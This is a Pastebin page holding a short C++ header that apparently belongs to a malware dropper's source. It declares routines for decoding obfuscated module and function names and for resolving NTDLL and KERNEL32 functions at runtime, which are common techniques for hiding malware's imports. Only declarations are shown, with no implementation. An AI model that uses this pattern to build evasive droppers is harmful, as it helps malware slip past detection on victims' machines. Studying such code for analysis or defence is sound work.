Advertisement
FlyFar

dropper_EncodingAlgorithms.h

Feb 19th, 2023 (edited)
538
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.58 KB | Cybersecurity | 0 0
  1. #ifndef __ENCODING_ALGORITHMS_H__
  2. #define __ENCODING_ALGORITHMS_H__
  3.  
  4. #include "StdAfx.h"
  5.  
  6. void DecodeModuleNameA(const WORD *pEncodedFunctionName, char *pDecodedFunctionName);
  7. void DecodeModuleNameW(const WORD *pEncodedModuleName, WCHAR *pDecodedModuleName);
  8.  
  9. HMODULE GetModuleNTDLL(void);
  10.  
  11. FARPROC GetFunctionFromModule(const WCHAR *pEncodedModuleName, const char *pEncodedFunctionName);
  12.  
  13. void __memcpy(void *lpTo, const void *lpFrom, size_t nSize);
  14.  
  15. FARPROC GetFunctionFromKERNEL32(const WORD *lpEncodedFunc);
  16. FARPROC GetFunctionFromNTDLL(const WORD *lpEncodedFunc);
  17.  
  18. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement